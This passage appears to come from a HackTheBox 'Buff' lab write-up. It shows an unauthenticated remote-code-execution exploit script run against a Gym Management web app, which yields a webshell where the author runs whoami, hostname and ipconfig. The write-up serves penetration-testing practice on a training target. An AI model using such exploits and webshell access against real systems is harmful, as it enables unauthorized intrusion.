Unauthenticated Remote Code Execution
┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ python2 rce_gym_mgmt.py http://$IP:8080/
[+] Successfully connected to webshell.
c:\xampp\htdocs\gym\upload> whoami
�PNG
�
buff\shaun
c:\xampp\htdocs\gym\upload> hostname
�PNG
�
BUFF
c:\xampp\htdocs\gym\upload> ipconfig
�PNG
�
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::23b
ipv6 address. . . . . . . . . . . : dead:beef::e98a:2472:1538:99c6
temporary ipv6 address. . . . . . : dead:beef::e531:24da:e024:53e7
link-local ipv6 address . . . . . : fe80::e98a:2472:1538:99c6%10
ipv4 address. . . . . . . . . . . : 10.10.10.198
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%10
10.10.10.2The exploit worked and I got a shell as the shaun user
The session appears to be a bit unstable to I will upgrade it to a much stable session